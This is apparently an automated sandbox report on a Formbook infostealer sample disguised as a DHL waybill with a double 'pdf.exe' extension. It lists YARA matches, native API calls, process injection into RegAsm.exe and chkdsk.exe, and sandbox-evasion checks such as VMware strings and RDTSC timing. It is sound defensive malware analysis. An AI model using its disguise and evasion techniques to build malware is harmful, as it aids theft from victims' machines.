          Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 02CBB150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004185F0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004186A0 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00418720 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004185EB NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CFA3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF98A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CFB040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF99D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF96D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CFA770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CFA710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF95F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF9520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CFAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FA85F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FA86A0 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FA87D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FA8720 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FA85EB NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FA87CA NtAllocateVirtualMemory,
          Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000000.289487536.0000000000BC6000.00000002.00020000.sdmpBinary or memory string: OriginalFilename44.exe4 vs DHL AWB# 4AB19037XXX.pdf.exe
          Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameediskcz.dll0 vs DHL AWB# 4AB19037XXX.pdf.exe
          Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314034652.00000000010E9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL AWB# 4AB19037XXX.pdf.exe
          Source: DHL AWB# 4AB19037XXX.pdf.exeBinary or memory string: OriginalFilename44.exe4 vs DHL AWB# 4AB19037XXX.pdf.exe
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeSection loaded: mscorjit.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: DHL AWB# 4AB19037XXX.pdf.exeVirustotal: Detection: 33%
          Source: DHL AWB# 4AB19037XXX.pdf.exeReversingLabs: Detection: 44%
          Source: DHL AWB# 4AB19037XXX.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe 'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe'
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL AWB# 4AB19037XXX.pdf.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/6
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_01
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: DHL AWB# 4AB19037XXX.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL AWB# 4AB19037XXX.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DHL AWB# 4AB19037XXX.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: ediskcz.pdb source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
          Source: Binary string: ediskcz.pdbh; source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.416441384.0000000002DAF000.00000040.00000001.sdmp, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
          Source: Binary string: RegAsm.pdb source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp
          Source: Binary string: c:\Users\Administrator\Desktop\44.pdbTBnB `B_CorExeMainmscoree.dll source: DHL AWB# 4AB19037XXX.pdf.exe
          Source: Binary string: wntdll.pdb source: RegAsm.exe, chkdsk.exe, 00000013.00000002.563005140.00000000053DF000.00000040.00000001.sdmp
          Source: Binary string: c:\Users\Administrator\Desktop\44.pdb source: DHL AWB# 4AB19037XXX.pdf.exe
          Source: Binary string: RegAsm.pdb4 source: chkdsk.exe, 00000013.00000002.559169564.00000000004F6000.00000004.00000020.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: DHL AWB# 4AB19037XXX.pdf.exe, Form.cs.Net Code: RawForm System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.DHL AWB# 4AB19037XXX.pdf.exe.bc0000.0.unpack, Form.cs.Net Code: RawForm System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.bc0000.0.unpack, Form.cs.Net Code: RawForm System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041B842 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041B84B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041B8AC push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0040BA4C push eax; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_00409D1D push cs; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041B7F5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0041BFB7 push es; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D0D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04F99D1D push cs; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FAB7F5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FABFB7 push es; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FAB8AC push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FAB84B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04FAB842 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_04F9BA4C push eax; retf

          Hooking and other Techniques for Hiding and Protection:

          Uses an obfuscated file name to hide its real file extension (double extension)
          Source: Possible double extension: pdf.exeStatic PE information: DHL AWB# 4AB19037XXX.pdf.exe
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: explorer.exe, 00000007.00000000.346274551.000000000E2BF000.00000004.00000001.sdmp Binary or memory string: DEMUL.EXE
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004F98614 second address: 0000000004F9861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000004F989AE second address: 0000000004F989B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe TID: 5572 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe TID: 4884 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 404 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe TID: 4780 Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\chkdsk.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
          Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314422237.0000000001350000.00000004.00020000.sdmp Binary or memory string: e48cvMCi6f
          Source: explorer.exe, 00000007.00000000.329977812.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.344459593.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.346864234.000000000EF2A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}soft.wi
          Source: explorer.exe, 00000007.00000000.367953216.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000007.00000000.322052236.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.344459593.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000007.00000000.322052236.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000007.00000000.346864234.000000000EF2A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R\S-1-5
          Source: explorer.exe, 00000007.00000000.346864234.000000000EF2A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3E560C6
          Source: explorer.exe, 00000007.00000000.344459593.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314231472.000000000113B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_02CE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D71C06 mov eax, dword ptr fs:[00000030h]
